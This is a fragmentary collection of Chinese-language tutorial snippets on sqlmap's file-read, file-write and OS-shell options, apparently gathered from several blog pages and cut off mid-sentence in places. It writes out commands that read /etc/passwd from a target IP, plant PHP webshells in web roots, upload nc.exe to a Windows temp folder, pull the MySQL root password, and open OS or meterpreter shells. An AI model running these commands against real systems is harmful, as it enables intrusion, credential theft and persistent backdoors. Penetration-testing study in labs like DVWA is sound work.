--file-write --file-dest:上传文件到数据库服务器中 该命令用于写入本地文件到服务器中,当数据库为MySQL、PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数时,上传的文件可以是文本,也可以是二进制文件。 sqlmap.py -u http://127.0.0.1/sqli-labs/Les
--sql-query #执行指定的sql语句 --file-read#读取指定文件 --file-write #写入本地文件 (--file-write /test/test.txt --file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt) --file-dest #要写入的文件绝对路径 --os-cmd=id#执行系统命令 --os-shell #系统交互shell --reg...
sqlmap -r“c:\request.txt” -p id –dbms mysql –file-dest “e:\php\htdocs\dvwa\inc\include\1.php” –file-write “f:\webshell\1112.php” 使用shell命令: 1 sqlmap -r“c:\tools\request.txt” -p id –dms mysql –os-shell 接下来指定网站可写目录: “E:\php\htdocs\dvwa” #注:...
–sql-query #执行指定的sql语句(–sql-query “SELECT password FROM mysql.user WHERE user = ‘root’ LIMIT 0, 1″ ) –file-read #读取指定文件 –file-write #写入本地文件(–file-write /test/test.txt –file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt) –file-dest...
--file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 --file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径 十、Operating system access(操作系统访问) --os-cmd=OSCMD 执行操作系统命令 --os-shell 交互式的操作系统的shell --os-pwn 获取一个OOB shell,meterpreter或VNC --os-smbrelay...
—file-read:文件系统访问 python sqlmap.py -u “59.63.200.79:8003/?“—file-read=”/etc/passwd” —file-write、—file-dest :写文件到目标位置 python sqlmap.py -u “59.63.200.79:8003/?“—file-write=”shell.php” —file-dest “/tmp/shell.php” —sql-shell : 进入交互式mysql窗口 python...
File system access --file-read=FILE..读文件--file-write=FIL..写文件 tamper -v 参数 0:只显示Python的回溯,错误和关键消息。1:显示信息和警告消息。2:显示调试消息。3:有效载荷注入。4:显示HTTP请求。5:显示HTTP响应头。6:显示HTTP响应页面的内容 0x03、文件相关 修改最大线程数 cd /usr/local/...
--file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 --file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径 1. 2. 3. 在kali中将/software/nc.exe文件上传到C:/WINDOWS/Temp下: python sqlmap.py -u"http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write="/softwa...
sqlmap.py -u "http://www.xxx.com/index.php?id=3" --file-write /opt/bmfx.php --file-dest /var/www/html/shell.php bmfx.php是攻击者本地文件,shell.php是上传到目标站点的文件名称 3. os-shell下载文件执行 4. 通过sqlmap连接MySQL获取shell ...
sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" --file-write C:\Users\Administrator\Desktop\test.txt --file-dest "C:\Users\Administrator\Desktop\test1.txt"这里在本地搭建的,将桌面的test.txt写入到桌面test1.txt文件。注意事项 该文档仅为学习交流。